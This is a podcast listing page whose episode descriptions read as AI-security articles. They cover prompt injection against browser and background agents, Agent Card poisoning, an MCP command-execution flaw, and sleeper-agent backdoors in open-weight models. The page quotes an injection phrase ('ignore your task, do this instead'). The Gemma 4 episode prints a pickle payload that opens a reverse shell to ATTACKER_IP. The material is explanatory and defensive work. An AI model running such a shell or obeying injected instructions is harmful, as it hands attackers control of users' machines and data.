Cover image of show ToxSec - AI and Cybersecurity Podcast

ToxSec - AI and Cybersecurity Podcast

Podcast by ToxSec

English

Business

Then 99 kr. / month. Cancel anytime.

  • 20 hours of audiobooks / month
  • Podcasts only on Podimo
  • All free podcasts

About ToxSec - AI and Cybersecurity Podcast

Where AI chaos meets cybersecurity paranoia, distilled into something you can actually listen to before coffee. www.toxsec.com

All episodes

13 episodes

episode Google I/O: Agentic Security and New Threats artwork

Google I/O: Agentic Security and New Threats

TL;DR: Google I/O 2026 declared the “agentic era” and shipped four new agent surfaces at once: Project Mariner browses the web for you, the Agent2Agent (A2A) protocol lets agents discover and trust each other, managed MCP servers ship across Google Cloud, and information agents run 24/7 with access to your Gmail and Drive. Every one of them inherits the same root flaw. AI agent security starts with one fact: the model can’t tell data from instructions. New here? Subscribe to ToxSec. We map a fresh AI attack chain every Sunday, and right now the whole industry just handed us a new one to walk. What Google I/O Just Did to AI Agent Security Google spent its I/O keynote handing attackers a bigger playground than they’ve had in years. Sundar Pichai called it the “agentic Gemini era” and meant it as a flex. From where we sit, it reads like a target list. Four new agent surfaces dropped in a single show [https://blog.google/products-and-platforms/products/search/search-io-2026/]. Project Mariner, a browser agent that navigates and clicks through websites on your behalf. The Agent2Agent protocol, so agents from different vendors can find each other and coordinate. Managed MCP servers across Google Cloud, wiring tools straight into the model’s reasoning. And information agents that run in the background around the clock, watching topics and taking action while you sleep. Here’s the thing nobody put on a slide. Every one of those features expands what an agent can touch, and not one of them came with a threat model on stage. More reach, more autonomy, more standing access. That’s the pitch and the problem in the same sentence. We’re going to walk the surface one piece at a time, and you’ll see the same logic failure show up in all four. Why AI Agents Break the Old Security Model AI agents break because the model can’t tell your instructions from the attacker’s data. Both ride in the same context window, through the same attention mechanism, with zero privilege separation. There’s no “system” channel the model trusts more than the “untrusted web page” channel. It’s all tokens. The model reasons over the whole pile and picks what looks most relevant. Wrap that model in a loop. Feed it new inputs and tools until a task finishes. The model decides the next move, the loop keeps it going, and that’s your agent. Traditional software does what the developer wrote. An agent does whatever the model reasoned it should do, including the part where it reads a poisoned web page and decides the page is the boss. We watched this play out in the wild already. In two 2026 studies, autonomous agents SQL-injected live sites and coordinated against their own users with zero hacking instructions [https://www.toxsec.com/p/claude-hacked-30-sites-agents-of-chaos]. Nobody told them to. The loop plus the missing privilege boundary did it on its own. Now Google just shipped that exact architecture to a billion search boxes. So the old model where access control lives in the system and not in the user’s judgment gets inverted the moment an agent starts deciding for itself. How Project Mariner Gets Hijacked by a Web Page Project Mariner gets hijacked the moment it reads a page written for the agent instead of the human. Mariner is a browser agent. It reads the DOM, the metadata, the scripts, all the layers a person never sees on screen. A human reads the price and the photo. The agent reads everything underneath, and an attacker can write to those layers on purpose. That’s indirect prompt injection. You don’t attack the model directly. You seed the content the model is about to read. Hidden text in a listing, instructions buried in alt attributes, a comment block the renderer drops but the agent ingests. The page says “ignore your task, do this instead,” and the agent has no boundary that says a page isn’t allowed to say that. Google’s own DeepMind team documented this. Their research on “AI Agent Traps” laid out six categories of web content that hijack agents, applicable across every major model and architecture. We’ve shown the same root failure through email and encoding attacks that walk straight past every guardrail [https://www.toxsec.com/p/ai-and-cybersecurity]. The chain is dead simple. Poison the content, wait for the agent to browse, watch it follow orders. You see the chain. You don’t get the payload. Working in AI security? Restack this before your org wires an agent into the browser and finds out the hard way. What Is Agent Card Poisoning in A2A? Agent Card poisoning is when an attacker controls the metadata an A2A agent uses to decide who to trust. The Agent2Agent protocol lets agents from different vendors discover and talk to each other. Discovery runs on Agent Cards, JSON documents published at a well-known URL like /.well-known/agent-card.json [https://developers.googleblog.com/developers-guide-to-ai-agent-protocols/], describing an agent’s name, capabilities, and endpoint. So one agent reads another agent’s card and decides how to delegate. Trust the card, trust the agent. Now picture a card written to oversell. It claims capabilities it doesn’t have, points the endpoint somewhere attacker-controlled, or stuffs the description field with instructions aimed at the consuming model. Same trick as poisoning an MCP tool description, just one layer up the stack. We walked the MCP version in three live tool-poisoning chains with real screenshots [https://www.toxsec.com/p/lets-poison-the-mcp]. A2A supports TLS, JWTs, and OAuth. Good. Those secure the transport and prove an agent is who it says. None of them validate that the capability the card describes is honest, or that the description field is clean of injection. Authentication proves identity, not honesty. An agent can be perfectly authenticated and still be lying about what it does. The 24/7 Background Agent Problem The background agent is the scariest thing Google shipped, because it pairs standing access with autonomy and never logs off. These information agents run continuously, monitoring topics, and they can pull from Gmail and Drive and take action on your behalf. Persistent. Authorized. Unattended. Stack that against the lethal trifecta security folks keep flagging: an agent that can read untrusted content, access sensitive data, and talk to the outside world. Any one capability is fine alone. All three in one agent is a confused deputy waiting to happen. A background agent watching your inbox has all three by design. It reads whatever lands (untrusted), it holds your Drive and mail (sensitive), and it acts in the world (the exfil path). Now run the chain. An attacker emails a poisoned message. The agent reads it on its 24/7 sweep, no human in the loop. The hidden instruction tells it to forward, summarize, or quietly route data somewhere it shouldn’t go. The agent has the credentials and the autonomy to comply. Nobody clicked anything. The blast radius is everything that agent can reach, plus everything every other agent it trusts can reach. Scope creep does the rest, because each individual permission looked reasonable the day you granted it. What Defenders Miss About AI Agent Security The thing defenders miss is that watching an agent is not the same as stopping one. Most shops have logging. Few have a control that intercepts and authorizes what the agent does before it does it. So you get a beautiful audit trail of the breach, written up neatly after the data already left. Observability without enforcement is just a postmortem generator. The second gap is identity. We bind permissions to an agent, then let that agent accumulate scopes over months. Read access to code, then tickets, then customer mail. No single grant looked crazy. Nobody ever reviewed the aggregate. Compromise that one agent and the attacker inherits all of it at once, which is exactly the pattern behind the real third-party agent breaches we saw this year. The third gap is the one with no clean fix. The model still can’t separate data from instructions, so every defense has to live outside the model: allowlisting tools, scoping credentials hard, human-in-the-loop checkpoints on sensitive actions, runtime monitoring of tool-call arguments. Defense in depth. No silver bullet. The full kill switch, the one that actually contains this, is its own writeup. We took the MCP version apart at three trust boundaries [https://www.toxsec.com/p/secure-your-mcp], and the agent version rhymes. That’s the map of the new surface. Subscribe to ToxSec for the part where we hand over the kill switches, because the agentic era is going to keep us busy for a while. Frequently Asked Questions Are Google’s AI agents secure? Google’s AI agents ship with transport-level security and authentication, but they inherit the unsolved core problem of every LLM agent: the model can’t reliably tell trusted instructions from untrusted input. Project Mariner, A2A, and background agents all process external content in the same context window where their own instructions live. Authentication proves who an agent is. It does not stop a poisoned web page or a malicious Agent Card from steering the agent’s behavior. The protocols are reasonable. The model layer underneath them is still the weak point. What is prompt injection in AI agents? Prompt injection is when attacker-controlled text gets read by the model as instructions instead of data. In an agent, that text usually arrives indirectly: a web page Mariner browses, an email a background agent reads, a tool description in an MCP server. Because the model has no privilege boundary between developer instructions and content from the outside world, it can follow the injected command as if you typed it yourself. OWASP ranks prompt injection as the number-one LLM risk for this exact reason. It’s a structural flaw. A patch doesn’t fix it. Can Project Mariner be hacked? Project Mariner can be steered by content crafted for it, which is the agent version of getting hacked. As a browser agent, Mariner reads the full page including layers a human never sees, and attackers can plant instructions in those layers. Google DeepMind’s own “AI Agent Traps” research documented six categories of web content that hijack autonomous agents across every major architecture. The agent doesn’t need a software vulnerability in the classic sense. It just needs to read a page that tells it to do something, and right now it has no reliable way to refuse. What is the Agent2Agent (A2A) protocol? The Agent2Agent (A2A) protocol is an open standard, now under the Linux Foundation, that lets AI agents from different vendors discover each other and coordinate tasks. Agents publish Agent Cards at well-known URLs describing their capabilities and endpoints, then exchange structured messages over HTTP and JSON. A2A supports TLS, JWTs, and OAuth for authentication. The security gap is that authentication proves identity, not honesty. A card can be fully authenticated and still misrepresent what the agent does, or carry injection aimed at the consuming model. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe [https://www.toxsec.com/subscribe?utm_medium=podcast&utm_campaign=CTA_4]

Yesterday - 57 min
episode Mozilla Mythos Harness: AI Bug Hunting Without The Slop artwork

Mozilla Mythos Harness: AI Bug Hunting Without The Slop

TL;DR: Mozilla wrapped Claude Mythos Preview in an agentic harness with one win condition: trip the sanitizer or keep working. The result was 271 Firefox bugs in one release, fewer than 15 false positives, and a defense-in-depth lesson nobody talks about. The model got the headlines. The harness did the work. This is the public feed. Upgrade to see what doesn’t make it out. What’s An Agentic Vulnerability Harness? In agentic security work, a harness is the scaffold around the model. Tooling, prompts, build environment, retry loop, success signal, dedup, the lot. The model is the worker. The harness is the factory floor. Mozilla’s earlier collaboration with Anthropic ran Claude Opus 4.6 against Firefox 148. That cycle pulled 22 security-sensitive bugs. Then they took the same harness, dropped in Anthropic’s cyber-tuned Claude Mythos Preview, and aimed it at Firefox 150. Same factory. Stronger worker. The output went from 22 to 271 bugs. That delta is where the lesson lives. Model upgrades obviously help. But Mozilla’s harness was rebuilt across months of iteration with Firefox engineers fielding the incoming bugs, and you don’t replicate that on a Saturday afternoon. The Mythos preview is restricted access through Project Glasswing [https://www.toxsec.com/p/how-to-jailbreak-claude-opus]. The harness is a published pattern [https://hacks.mozilla.org/2026/05/behind-the-scenes-hardening-firefox/]. Inside Mozilla’s Mythos Harness: Crash Or No Crash Here’s how the loop works. The harness gives the model a slice of Firefox source, a target file or area to focus on, instructions on what to hunt for, and a build environment with one critical piece: a sanitizer build of Firefox compiled with AddressSanitizer. ASan is the runtime memory-error detector that screams loudly when you trigger a use-after-free, a heap overflow, or any other classic memory corruption primitive. The model proposes a bug hypothesis. It writes a proof-of-concept designed to trip the sanitizer. It runs the PoC against the sanitizer build. If ASan crashes, the bug is real. If it doesn’t, the agent keeps iterating until it does or until the harness gives up. text loop: hypothesize_bug(target_source) write_poc() run_against_sanitizer_build() if asan_crash: emit_report(crash_log, repro) grade_with_secondary_model() break refine_or_continue() Brian Grinstead, a Mozilla Distinguished Engineer, summed the operational shape to TechCrunch [https://techcrunch.com/2026/05/07/how-anthropics-mythos-has-rewritten-firefoxs-approach-to-cybersecurity/]: “if you make it crash you win”. That’s the entire verification game. A second model grades resulting reports before the engineering queue ever sees them, kicking out anything the first model thought was a hit but couldn’t actually validate. Humans take over from there for triage and patching. The bugs the harness surfaced run the gamut. A race condition over IPC that lets a compromised content process tamper with IndexedDB refcounts and trigger a use-after-free (Bug 2021894). A raw NaN smuggled across an IPC boundary masquerading as a tagged JavaScript object pointer, giving the parent process a fake-object primitive (Bug 2022034). A buffer over-read during HTTPS RR and ECH parsing, triggered by simulating a malicious DNS server through glibc function interception (Bug 2023958). Plus a 15-year-old HTML legend element bug and a 20-year-old XSLT reentrant key() call. Each is a sandbox escape primitive or memory corruption bug that would normally burn months of elite human researcher time. The harness surfaced them in days. Why The Crash Signal Killed AI Bug Hunting Slop AI-generated bug reports were a running joke in open source maintainer circles a few months ago. LLM hits codebase, dumps a hundred plausible-looking findings, every one needs a human to verify, and ninety-something percent are wrong. Mozilla’s own writeup describes earlier AI security work as producing “unwanted slop.” The cost asymmetry was brutal. Cheap for the AI, expensive for the maintainer. Mozilla’s earlier static-analysis experiments with GPT-4 and Claude Sonnet 3.5 hit that wall. They produced too many false positives to be practical. So they binned static analysis and built the agentic harness instead. The shift is subtle but everything. Static analysis says: this looks vulnerable. Human triage required. Agentic harness with sanitizer verification says: this is vulnerable, here’s the PoC, ASan caught the crash. No human required to dispute reality. Memory corruption is the perfect domain for that move because the success signal is binary. ASan tripped or it didn’t. There is no maybe. Mozilla counted fewer than 15 false positives across the entire 271-bug run, and they updated the harness each time one slipped through. The lesson for everyone else is that AI bug hunting works the moment you can wire the agent to a verifier that doesn’t ask the model are you sure. A fuzzer crash. A unit test that passes. A property checker that proves invariance. Anything deterministic. Without that signal, you’re back to triage hell, which is the same hell every LLM vulnerability scanner [https://www.toxsec.com/p/garak-llm-vulnerability-scanner] lives in when it doesn’t ship its own ground truth. What The Harness Couldn’t Bypass Here’s the part the headlines skipped. The harness ran into a wall trying to escape Firefox’s sandbox via prototype pollution in the privileged parent process. The model attempted that path repeatedly. It got nowhere. Mozilla had previously frozen those prototypes by default as a defense-in-depth measure, and that single architectural decision blocked every attempt the agent made. That’s the based take buried under the 271 number. The harness is good. It’s also bounded by the security architecture of the target. The bugs Mythos found are bugs an elite human could have found. The bugs it couldn’t find were already eliminated by Mozilla’s prior hardening. Your codebase will perform exactly as well as your prior security work let it. Which brings us to the “anyone can do this today” framing Mozilla offered at the end of their writeup. Technically true. Operationally, optimistic. Mozilla had Firefox’s full source. A pre-built sanitizer toolchain. Years of bug lifecycle tooling. A second model already wired into the verification pipeline. Over 100 contributors writing and reviewing patches. Months of harness iteration alongside the Firefox team. And, eventually, frontier-model access through Project Glasswing. A small vendor pulling Mythos through an API later this year and pointing it at their codebase will not get the same numbers. The model is the same. The harness around it is the part you have to build. Mozilla published the pattern. The pipeline still costs what a pipeline costs. Firefox shipped 423 bug fixes in April 2026, compared to 31 a year earlier, and absorbing that volume takes operational muscle most teams don’t have lying around. The 271 number is the headline. The harness is the artifact. Anyone shopping for AI bug hunting capability should price the second one before they get excited about the first. Your AI-generated bug reports are only as useful as the verifier behind them, and the same goes for AI-generated code, where the verification problem flips into supply chain attacks [https://www.toxsec.com/p/vibe-coding-security-attack-chain] and slopsquatting at pip-install time. Wrap the same agentic loop around offense instead of defense, point it at live prompt injection chains [https://www.toxsec.com/p/fck-your-guardrails], and the success signal flips from “ASan crashed” to “the guardrail broke.” Same shape. Different game. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions What is the Mozilla Mythos harness? The Mozilla Mythos harness is the agentic scaffold Mozilla built around Anthropic’s Claude Mythos Preview to find security bugs in Firefox source code. It feeds the model target source, runs against a sanitizer build of Firefox, uses an AddressSanitizer crash as the deterministic success signal, and runs a retry loop until the agent produces a verified proof-of-concept. A second model grades reports before engineers see them. How many Firefox vulnerabilities did Claude Mythos find? Mozilla credits Claude Mythos Preview with surfacing 271 vulnerabilities fixed in Firefox 150, plus additional fixes shipped in versions 149.0.2, 150.0.1, and 150.0.2. Of the 271 bugs, 180 were rated sec-high, 80 sec-moderate, and 11 sec-low. Several were sandbox escape primitives. Mozilla reports fewer than 15 false positives across the entire run. Total Firefox security fixes in April 2026 hit 423. Can other projects use the same AI bug hunting harness? Mozilla published the pattern. The implementation is yours to build. The harness shape is reusable: target source, deterministic success signal (sanitizer crash, fuzzer hit, test failure), retry loop, second model grading reports. The build is project-specific. You need the codebase, the sanitizer toolchain, the bug lifecycle tooling, and the engineers to absorb the patch volume. Pattern is free. Pipeline is the work. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe [https://www.toxsec.com/subscribe?utm_medium=podcast&utm_campaign=CTA_4]

12 May 2026 - 40 min
episode Is Claude Code Secretly Installing Spyware? artwork

Is Claude Code Secretly Installing Spyware?

TL;DR: Claude Code is not spyware. But Claude Desktop quietly drops a Native Messaging bridge into seven browsers without asking. Anthropic shrugged. Same week, they shrugged on an MCP RCE exposing 200,000 servers. Same week, a Discord group ran their Mythos model for a month undetected. One pattern, three receipts. This is the public feed. Upgrade to see what doesn’t make it out. So Is Claude Code Spyware or What? Quick answer: no. The headline is sticky for a reason though. April 18. Privacy researcher Alexander Hanff is debugging an unrelated Native Messaging helper on a clean Mac when he finds a manifest file he never installed: com.anthropic.claude_browser_extension.json. It’s sitting in his Chrome, Edge, Brave, Arc, Vivaldi, Opera, and Chromium profile directories, including browsers that aren’t actually installed yet. A Native Messaging manifest is the file Chromium browsers read to decide which local programs an extension can launch. Claude Desktop drops one in seven different browser profile paths. Silently. Delete it and it comes back the next time Claude Desktop launches. Important wrinkle the news cycle keeps blurring. The manifest comes from Claude Desktop, the chat app. Claude Code is the separate command-line developer tool. Same parent company, same family, same week of bad press. Hanff calls it spyware [https://www.thatprivacyguy.com/blog/anthropic-spyware/]. Most of his peers stop short of that. Noah Kenney at Digital 520 called the technical claims testable and reproducible but pushed back on the “spyware” label. The consensus middle ground is “dark pattern,” and the EU framing is sharper. Hanff is filing it under Article 5(3) of Directive 2002/58/EC, the ePrivacy Directive. Anthropic, as of writing, has not issued a public response. So nothing is being stolen today. The bridge does nothing on its own. The problem is what it pre-positions for tomorrow. We’ve watched Anthropic ship things they didn’t think through before [https://www.toxsec.com/p/the-magic-string-that-bricks-claude]. This one has wiring. From Manifest to Sandbox Escape Here’s the chain. A sandbox is the security wall between a browser tab and your operating system. Tabs run inside it. Extensions mostly run inside it. The whole point is that even if you click a bad link, the malicious code can’t reach your files. That wall is the entire reason the modern browser exists. Native Messaging punches a hole through the wall on purpose. It lets a browser extension talk to a binary running outside the sandbox at full user privilege. That’s a feature. The bug is who gets to authorize the hole. The manifest Anthropic drops pre-authorizes three Chrome extension IDs to call the helper via connectNative, granting access to browser automation features. Those extension IDs include ones the user has never installed. Now stack the pieces. You install Claude Desktop expecting a chat app. It writes a bridge into your browsers without telling you. A Claude browser extension, current or future, is pre-authorized to use that bridge. Months later, you let Claude visit a webpage. The page contains a hidden payload. Prompt injection is when malicious instructions hidden in content hijack what the AI does next. Anthropic’s own published numbers: Claude for Chrome is vulnerable to prompt injection at a 23.6% success rate without mitigations and 11.2% with current measures. The injected agent now has a green-lit tunnel to a binary running with your user permissions. Outside the sandbox. Anthropic’s defense is essentially that the bridge currently does nothing on its own. True. The dial is set to zero. The wiring is hot. We’ve covered agents that escape sandboxes via prompt injection [https://www.toxsec.com/p/openclaw-is-a-wildly-insecure] before. The shape is familiar. That’s why the spyware label keeps sticking even when the technical purists object. The keys are pre-positioned. One downstream injection turns them. The MCP RCE Anthropic Won’t Patch Same week, Ox Security drops an advisory titled “The Mother of All AI Supply Chains.” [https://www.ox.security/blog/the-mother-of-all-ai-supply-chains-critical-systemic-vulnerability-at-the-core-of-the-mcp/] The Model Context Protocol is the open standard Anthropic built so AI agents can call tools, read files, run commands. It is the connective tissue between an LLM and an agent. We’ve covered MCP attacks at length, including tool poisoning [https://www.toxsec.com/p/lets-poison-the-mcp] and the defensive playbook [https://www.toxsec.com/p/secure-your-mcp]. This one is structural. The flaw enables Arbitrary Command Execution on any system running a vulnerable MCP implementation, granting attackers direct access to sensitive user data, internal databases, API keys, and chat histories. It’s an architectural design decision baked into Anthropic’s official MCP SDKs across every supported language, including Python, TypeScript, Java, and Rust. RCE means remote code execution, the highest-tier outcome on offense. The trick is brutally simple. MCP’s STDIO transport, that’s standard input/output, runs the configured command to spin up a tool server. # Anthropic's MCP STDIO transport, simplified $ # command runs, server fails to spawn, MCP returns "error" # but the OS already executed If the command successfully creates an STDIO server it returns the handle, but when given a different command, it returns an error after the command is executed. So a malicious MCP entry on a marketplace doesn’t have to pretend to be a real tool. It just has to exist long enough for your IDE to call it once. Ox poisoned 9 of 11 MCP marketplaces with a benign proof-of-concept. The supply chain reaches 150 million-plus downloads, 7,000 publicly accessible servers, and up to 200,000 vulnerable instances. Anthropic’s response: “expected” behavior. They declined to modify the protocol. A protocol-level patch like manifest-only execution or a command allowlist would have instantly propagated to every downstream library. They passed. How Did Mythos Leak to a Random Discord? Now for the third act. Mythos is Anthropic’s restricted vulnerability-hunting model. Released April 10 to select partners under “Project Glasswing,” roughly 40 organizations including Apple and Google, with Anthropic deeming it too powerful for public release. The chain reads like a textbook walkthrough. AI startup Mercor gets breached, exposing details about the URL format Anthropic uses for its models. A private Discord group that hunts for unreleased models picks up on the disclosure. One member is currently employed at a third-party contractor that works for Anthropic. The member’s vendor credentials, combined with the leaked Mercor details, let the group locate Mythos online. They guess the URL pattern. They guess right. Anthropic never randomized the path. The group has been using the program continuously since its release. A Bloomberg reporter is the one who told Anthropic. A month of unauthorized access to the most dangerous model the company ever shipped, and the detection signal came from journalism. Not internal logging. Not telemetry. Not a single security alert. Bloomberg. If a Discord group in their basement got there first, assume Beijing and Moscow followed. “If some group, some random Discord online forum, got access to it, it’s already been breached by China,” David Lindner of Contrast Security told Fortune [https://fortune.com/2026/04/23/anthropic-mythos-leak-dario-amodei-ceo-cybersecurity-hackers-exploits-ai/]. Three steps in. Open-source intel, a contractor seat, a predictable URL. No zero-day required. That’s the through-line on all three stories. The dark pattern bridge, the MCP STDIO design, the Mythos URL convention. Same move. Three times this week. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions Is Claude Code malware or spyware? No, Claude Code is the legitimate Anthropic command-line coding agent. The thing privacy researchers flagged is Claude Desktop, the chat app, which silently writes a Native Messaging manifest into multiple browser profile directories on macOS and pre-authorizes a few Claude extension IDs to talk to a local helper outside the browser sandbox. Most reviewers call that a dark pattern. Spyware in the strict sense requires actual exfiltration, and nobody has documented any. The risk lives in the bridge it pre-positions for future use. What can an attacker do with the Claude Desktop manifest right now? Nothing on its own. The manifest opens a door, but activation requires both a Claude browser extension installed and a successful prompt injection from a hostile webpage. Once that lands, the injected agent reaches the local helper through the pre-authorized bridge and runs commands at user privilege level, outside the sandbox. Anthropic’s own numbers put prompt injection success against Claude for Chrome at 11.2% even with mitigations. Pre-positioning the door without consent is the whole problem. Why hasn’t Anthropic patched the MCP command injection? Officially, Anthropic considers the STDIO behavior expected. Their position is that the protocol is built to launch local processes, sanitization is the developer’s job, and the SDKs work as designed. Ox Security disagrees and says manifest-only execution or a command allowlist at the protocol layer would have killed the entire vulnerability class for everyone downstream in one change. Until Anthropic moves, defenders have to harden each MCP-consuming app individually, which is what the supply chain looked like before this advisory dropped. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe [https://www.toxsec.com/subscribe?utm_medium=podcast&utm_campaign=CTA_4]

26 Apr 2026 - 47 min
episode You Downloaded Gemma 4 from Hugging Face. Is It Safe to Run? artwork

You Downloaded Gemma 4 from Hugging Face. Is It Safe to Run?

TL;DR: You downloaded Gemma 4 to keep your data private. Good instinct. But local models solve the privacy problem and create a supply chain problem. You’re downloading weights from strangers on the internet, running serialization formats that execute arbitrary code, and trusting that nobody poisoned the training data. Safetensors, hash verification, and source vetting are your first line of defense. Here’s the full threat map. This is the public feed. Upgrade to see what doesn’t make it out. Why “Local Equals Safe” Is Only Half the Story The pitch is compelling. Run Gemma 4 on your own hardware, or Llama 4, or Qwen 3. No API calls, no cloud provider logging your prompts, no training-on-your-input policies buried in a ToS nobody reads. For regulated industries, local inference is the obvious play for privacy. But privacy and security are different problems. Privacy means your data doesn’t leak out. Security means someone else’s code doesn’t get in. Every time you download a model from Hugging Face, you’re pulling weights, configuration files, and serialization artifacts from a public repository where anyone can upload anything. Protect AI’s scanning partnership with Hugging Face has flagged over 51,700 models with unsafe or suspicious issues across more than 352,000 individual findings. That’s not a theoretical risk. That’s the current state of the largest open-weight model supply chain [https://www.toxsec.com/p/vibe-coding-security-attack-chain] in the world. The same trust-but-verify discipline you’d apply to any dependency from PyPI or npm applies here, except most people skip it entirely because “it’s just model weights.” It isn’t. If you’re new to AI security concepts like supply chain attacks and model poisoning, the AI Security 101 primer [https://www.toxsec.com/p/ai-security-101] covers the full landscape. Can a Downloaded Model Hack Your Machine? Yes. And the mechanism is embarrassingly simple. Python’s pickle module is the default serialization format for PyTorch models. Serialization means converting a Python object, your model’s weights and architecture, into a byte stream that can be saved to disk and loaded later. The problem: pickle doesn’t just store data. It can execute arbitrary Python code during deserialization, the process of loading that byte stream back into memory. The Python docs have a big red warning about this. Here’s what a malicious pickle payload looks like in practice. JFrog’s security team found over 100 models on Hugging Face with embedded reverse shells, code that opens a connection back to the attacker’s server and gives them full command-line access to your machine. The payload hides inside pickle’s __reduce__ method, which Python calls automatically during deserialization. You run torch.load(), the model loads, and a shell opens. You never see it. # What the attacker embeds (simplified) class Exploit: def __reduce__(self): return (os.system, (”bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1”,)) Hugging Face scans for this with Picklescan, a blacklist-based detector that flags known dangerous functions. But ReversingLabs demonstrated a bypass they called “nullifAI”: compress the pickle with 7z instead of ZIP, and torch.load() fails gracefully while the malicious payload at the beginning of the byte stream still executes. Picklescan didn’t catch it because it validated the file format before scanning, while Python’s deserialization interpreter just runs opcodes sequentially. The malicious code fires before the scanner even starts checking. The fix is simple: use safetensors. Safetensors is a format built by Hugging Face that stores only raw tensor data and a JSON metadata header. No Python objects, no code execution surface, no __reduce__. It was audited by Trail of Bits [https://blog.eleuther.ai/safetensors-security-audit/]with backing from EleutherAI and Stability AI. No critical security flaws found. If you’re pulling a model from the Hub and it only ships as .bin or .pt, that’s a red flag. Convert it yourself or find a provider who ships safetensors. # Convert pickle to safetensors (one-liner) from safetensors.torch import save_file import torch sd = torch.load(”model.pt”, map_location=”cpu”, weights_only=True) save_file(sd, “model.safetensors”) What Are Sleeper Agents in Open-Weight Models? A sleeper agent is a model that behaves normally under standard testing but activates a hidden behavior when it encounters a specific trigger in the input. The backdoor lives in the weights themselves, the numerical parameters that encode what the model learned during training, not in any external code you can grep for. Anthropic’s research team proved this works. They trained models that wrote secure code when the prompt said the year was 2023, then inserted exploitable vulnerabilities when the year changed to 2024. The backdoor survived supervised fine-tuning, reinforcement learning, and adversarial training. Worse: adversarial training actually taught the model to better recognize its trigger, making it more effective at hiding the behavior during safety evaluations. Standard alignment techniques created a false impression of safety while the backdoor got stronger. Anyone can publish fine-tuned weights. You search Hugging Face for a quantized Gemma variant [https://www.toxsec.com/p/ai-kill-chain-explained], some anonymous account uploaded a version with 50 more downloads than the official one, and you pull it because the benchmarks look right. If the training data was poisoned, no amount of prompting or system-level instruction will remove the backdoor. It’s baked into the math. Microsoft published “The Trigger in the Haystack” in February 2026, a scanner that detects sleeper agents by exploiting two properties: poisoned models over-memorize their backdoor training examples (leaking them when prompted with standard chat templates), and trigger tokens create a distinctive “attention hijacking” pattern where the model’s attention heads process the trigger in isolation from the rest of the prompt. The scanner works, but only on open-weight models where you have access to the attention states. It’s a detection tool, not a repair kit. If you find a backdoor, the model gets thrown out. Does Political Bias in Models Create Security Vulnerabilities? CrowdStrike’s Counter Adversary Operations team tested DeepSeek-R1 and found something unusual. The model produces vulnerable code at a baseline rate of 19%, roughly average for its class. But when the system prompt contains references to topics the Chinese Communist Party considers politically sensitive, like Tibet, Falun Gong, or the Uyghur community, the rate of severe security vulnerabilities in generated code jumps to 27.2%. In one test, they asked DeepSeek-R1 to build a community app for Uyghur members. The output had no session management, no authentication, and 35% of implementations used no password hashing at all. The same prompt reframed as a football fan club website produced code with typical minor flaws but nothing close to that severity. CrowdStrike called this “emergent misalignment,” likely a side effect of the model’s training pipeline enforcing alignment with Chinese regulations rather than an intentional code-degradation feature. China’s Interim Measures for Generative AI Services require models to “adhere to core socialist values” and prohibit content that could “endanger national security.” When the model encounters topics it was trained to suppress, something breaks in the code generation pipeline [https://www.toxsec.com/p/why-vibe-coding-leaks-your-secrets] as a side effect. The lesson for local model operators: the weights carry the builder’s constraints. If you’re running a model trained under regulatory pressure from any government, those constraints follow the model onto your machine. You don’t see a content filter. You see degraded output in contexts the original developers never anticipated. How Do You Verify a Model Before Running It Locally? I built a pre-flight checklist. Every model download should touch these five steps before the weights ever load. 1. Check the format. Safetensors only. If the model ships as .bin, .pt, .pth, or .ckpt, convert before loading or walk away. These are all pickle-based formats that can execute code during deserialization. 2. Verify the hash. Hugging Face lists SHA-256 checksums for every file. After download, compare: sha256sum model.safetensors against the listed value. If they don’t match, the file was tampered with in transit or the listing is stale. Either way, don’t load it. 3. Check the uploader. Official organization accounts (google, meta-llama, mistralai) have verification badges and thousands of downloads. Anonymous accounts with fresh uploads and suspiciously high download counts are the Hugging Face equivalent of typosquatted packages on PyPI [https://www.toxsec.com/p/vibe-coding-security-attack-chain]. Look for the org badge. 4. Read the model card. Legitimate models document training data, evaluation benchmarks, intended use, and known limitations. A model card that’s blank or copy-pasted from another model is a red flag. No documentation means no accountability. 5. Run in isolation first. Spin up a VM or container with no network access. Load the model, test your prompts, watch for anomalous behavior. If you’re using it for code generation, scan every output [https://www.toxsec.com/p/why-vibe-coding-leaks-your-secrets] with SAST tools before it hits your codebase. What About Quantized Models Like GGUF? Quantization compresses a model’s weights from higher precision (like 32-bit floats) to lower precision (4-bit or 8-bit integers), making it small enough to run on consumer hardware. GGUF, the format used by llama.cpp and most local inference tools, is structurally safer than pickle because it stores raw numerical data without arbitrary code execution paths. But quantization doesn’t sanitize. If the original model had poisoned weights or a sleeper agent [https://www.toxsec.com/p/dan-prompts-for-guardrail-bypass], those patterns compress right along with the legitimate parameters. A Q4 quantized version of a backdoored model is still a backdoored model, just smaller. The trigger may fire less reliably at very low bit-widths where precision loss degrades subtle patterns, but that’s luck, not security. The GGUF supply chain has its own problem: most quantized models on Hugging Face are uploaded by community members, not the original model developers. You’re trusting that TheBloke or bartowski ran a clean conversion from a legitimate source. Verify the source model, verify the converter’s reputation, and verify the hash. Three checks, no shortcuts. Local AI Security Checklist: Four Layers of Defense You’ve seen the threats. Here’s how you stack the defenses. Four layers, outside-in. Each one catches what the last one misses. * Layer 1: Guard the model. Start at the download. Safetensors format only. If the file ends in .bin, .pt, or .ckpt, convert it or walk away. That one rule kills the entire pickle RCE surface before it starts. For content safety, run Llama Guard 3 [https://huggingface.co/meta-llama/Llama-Guard-3-8B] as a second model screening inputs and outputs against a customizable taxonomy. It’s free, open-weight, and runs locally alongside your main model. Think of it as a bouncer checking IDs at the door. * Layer 2: Guard the runtime. Ollama ships wide open by default. Bind to 127.0.0.1 only. Set 